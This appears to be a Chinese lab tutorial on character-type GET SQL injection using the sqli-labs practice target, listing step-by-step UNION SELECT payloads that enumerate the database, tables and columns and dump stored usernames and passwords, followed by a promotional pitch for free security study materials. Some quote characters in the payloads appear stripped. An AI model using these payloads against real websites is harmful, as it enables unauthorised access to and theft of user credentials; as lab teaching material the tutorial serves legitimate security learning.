
一、原理字符型GET注入其注入点存在于URL中的GET参数处如http://www.testweb.com/user.php?idadmin而服务器后端实际查询代码原型诸如“select … from … where id’$id’…” 。攻击者可以通过构造恶意的GET输入参数利用union select命令进行注入暴露数据库中存储的信息。二、例子使用sqli-labs中的第一关1、根据网页提示先给定一个GET参数即http://[靶机IP]/sqli-labs/Less-1/?id1此时页面显示id1的用户名Dump、密码Dump。2、寻找注入点分别使用以下3条payload寻找注入点及判断注入点的类型http://[靶机IP]/sqli-labs/Less-1/?id1运行后报错http://[靶机IP]/sqli-labs/Less-1/?id1 and 11运行后正常显示http://[靶机IP]/sqli-labs/Less-1/?id1 and 12运行后未正常显示由上述结果可以判断网站存在字符型注入点。3判断网站查询的字段数尝试使用以下payload获取网站查询的字段数关键字order byhttp://[靶机IP]/sqli-labs/Less-1/?id1 order by 1--http://[靶机IP]/sqli-labs/Less-1/?id1 order by 2--正常显示http://[靶机IP]/sqli-labs/Less-1/?id1 order by 3--正常显示http://[靶机IP]/sqli-labs/Less-1/?id1 order by 4--报错由上述结果可以判断网站查询的字段数为3。4判断网站的回显位置利用以下payload判断网站的回显位置http://[靶机IP]/sqli-labs/Less-1/?id1 and 12 union select 1,2,3--5获取网站当前所在数据库的库名使用以下payload获取网站当前所在数据库的库名http://[靶机IP]/sqli-labs/Less-1/?id1 and 12 union select 1,2,database()--显示结果为security。6获取数据库security的全部表名使用以下payload获取数据库security的全部表名http://[靶机IP]/sqli-labs/Less-1/?id1 and 12 union select 1,2,group_concat(table_name) from information_schema.tables where table_schemasecurity--显示结果中有一个名为users的表这当中可能存放着网站用户的基本信息。7获取users表的全部字段名使用以下payload获取users表的全部字段名http://[靶机IP]/sqli-labs/Less-1/?id1 and 12 union select 1,2,group_concat(column_name) from information_schema.columns where table_schemasecurity and table_nameusers--显示结果users表中有id、username和password三个字段。8获取users表id、username和password字段的全部值。由于users表中存放着多组用户名和密码的数据而每次只能显示一组数据我们可以通过limit M,N的方式逐条显示如1显示第1组数据http://[靶机IP]/sqli-labs/Less-1/?id1 and 12 union select 1,2,concat_ws(,,id,username,password) from security.users limit 0,1--显示结果为DumpDump。2显示第2组数据http://[靶机IP]/sqli-labs/Less-1/?id1 and 12 union select 1,2,concat_ws(,,id,username,password) from security.users limit 1,1--显示结果为AngelinaI-kill-you。3显示第3组数据http://[靶机IP]/sqli-labs/Less-1/?id1 and 12 union select 1,2,concat_ws(,,id,username,password) from security.users limit 2,1--显示结果为Dummypssword。以此类推可通过修改limit后面的参数将users表中存放的所有用户信息全部暴露出来。实验至此结束字符串注入跟数值型注入类似就是寻找注入点时不一样而已如何系统学习网络安全网络安全作为数字时代的核心技术基石已成为保障各行业安全稳定运行的坚实屏障。筑牢网络安全的防线掌握先进的防护策略和技能正上升为国家与企业发展的战略优先级。构建稳固的网络安全能力是一个体系的工程需要从夯实基础理论出发持续深化到攻防对抗与应急响应的实战层面。如果你是准备学习网络安全黑客或者正在学习我可以把我自用的360独家内部资料分享给你包含以下内容你应该能用得上①网络安全学习路线②20份渗透测试电子书③安全攻防357页笔记④50份安全攻防面试指南⑤安全红队渗透工具包⑥网络安全必备书籍⑦100个漏洞实战案例⑧安全大厂内部视频资源⑨历年CTF夺旗赛题解析一、网络安全黑客学习路线网络安全黑客学习路线形成网络安全领域所有的知识点汇总它的用处就在于你可以按照上面的知识点去找对应的学习资源保证自己学得较为全面。二、网络安全教程视频我们在看视频学习的时候不能光动眼动脑不动手比较科学的学习方法是在理解之后运用它们这时候练手项目就很适合了。三、网络安全CTF实战案例光学理论是没用的要学会跟着一起敲要动手实操才能将自己的所学运用到实际当中去这里带来的是CTFSRC资料HW资料毕竟实战是检验真理的唯一标准嘛~四、网络安全面试题最后我们所有的作为都是为就业服务的所以关键的临门一脚就是咱们的面试题内容所以面试题板块是咱们不可或缺的部分这里我给大家准备的就是我在面试期间准备的资料。网安其实不难难的是坚持和相信自己我的经验是既然已经选定网安你就要相信它相信它能成为你日后进阶的高效渠道这样自己才会更有信念去学习才能在碰到困难的时候坚持下去。机会属于有准备的人这是一个实力的时代。人和人之间的差距不在于智商而在于如何利用业余时间只要你想学习什么时候开始都不晚不要担心这担心那你只需努力剩下的交给时间这份完整版的网络安全学习资料已经上传CSDN朋友们如果需要可以微信扫描下方CSDN官方认证二维码免费领取【保证100%免费】